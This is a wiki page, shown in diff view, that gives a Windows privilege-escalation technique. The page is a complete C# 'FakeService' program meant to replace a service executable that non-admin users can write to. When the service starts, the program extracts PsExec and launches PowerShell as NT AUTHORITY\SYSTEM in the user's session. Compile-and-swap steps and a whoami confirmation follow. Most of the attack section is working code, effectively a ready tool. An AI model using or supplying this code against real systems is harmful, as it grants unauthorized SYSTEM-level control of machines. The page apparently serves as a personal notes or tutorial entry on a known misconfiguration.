« Privilege escalation » : différence entre les versions
De Banane Atomic
Aller à la navigationAller à la recherche
| Ligne 16 : | Ligne 16 : | ||
// use sysinternals' PsExec to run cmd.exe in session 1. | // use sysinternals' PsExec to run cmd.exe in session 1. | ||
Process.Start(psExecPath, $"-accepteula -d -i 1 {powershellPath}"); | Process.Start(psExecPath, $"-accepteula -d -i 1 {powershellPath}"); | ||
// stop the service after 1s | |||
Thread.Sleep(1000); | |||
new Thread(() => this.Stop()).Start(); | |||
} | } | ||
Dernière version du 20 février 2022 à 16:07
With a writable Windows service
If the executable of a Windows service is writable by non-admin users, you can replace it with another executable that will launch a command prompt in the system account.
| FakeService.cs |
public class FakeService : ServiceBase
{
protected override void OnStart(string[] args)
{
Thread.Sleep(10000); // wait 10s for the user to log and Windows to start
var psExecPath = ExtractPsExec(); // extract the PsExec.exe file
var powershellPath = @"C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe";
// Windows services run in session 0 and user account runs in session 1.
// use sysinternals' PsExec to run cmd.exe in session 1.
Process.Start(psExecPath, $"-accepteula -d -i 1 {powershellPath}");
// stop the service after 1s
Thread.Sleep(1000);
new Thread(() => this.Stop()).Start();
}
private string ExtractPsExec()
{
var psExecPath = Path.Combine(Path.GetTempPath(), "PsExec64.exe"); // temp path: C:\Windows\Temp
if (!File.Exists(psExecPath))
File.WriteAllBytes(psExecPath, Resources.PsExec64);
return psExecPath;
}
}
|
| Program.cs |
class Program
{
static void Main(string[] args)
{
ServiceBase.Run(new ServiceBase[] { new FakeService() });
}
}
|
- Replace the executable of the Windows service by the compiled application.
- A command prompt will be launched when the Windows service starts.
|
whoami REM nt authority\system |
